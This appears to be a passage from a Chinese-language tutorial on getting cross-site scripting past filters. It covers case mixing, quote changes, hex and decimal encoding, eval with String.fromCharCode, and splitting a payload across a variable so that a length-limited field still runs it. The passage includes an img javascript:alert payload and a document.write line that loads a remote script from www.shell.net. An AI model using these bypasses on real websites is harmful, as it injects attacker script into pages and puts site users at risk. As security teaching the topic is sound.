7)扰乱过滤规则
1.大小写转换
2.不使用双引号,使用单引号。
<img scr=‘javascript:alert(“xss”)’>
3.大小写混合
4.不使用引号
5.利用字符编码,对字符串进行十六进制、和十进制的转化。
8)另外JavaScript中有一个eval函数,该函数可以计算字符串,并执行其中的Javascript代码。我们可以使用\连接十六进制字符串,然后使用eval()函数执行十六进制字符串形式的脚本。
我们可以结合使用eval和string.fromCharCode()函数。后者的函数可用于将字符串转化为ascll值。前者函数也可以执行十进制的脚本语言。
9)拆分跨站法。
什么叫跨站分析法?就是说浏览器没有过滤掉<>,这些字符串,但是却限制了字符串的长度。
上述代码的作用是引入一个变量z,并且将下行代码拆分下来,
document.write(’<script src=//www.shell.net/1.js></script>’),然后将其分几次嵌入到变量z中,最后通过eval(z)函数巧妙的执行带啊吗。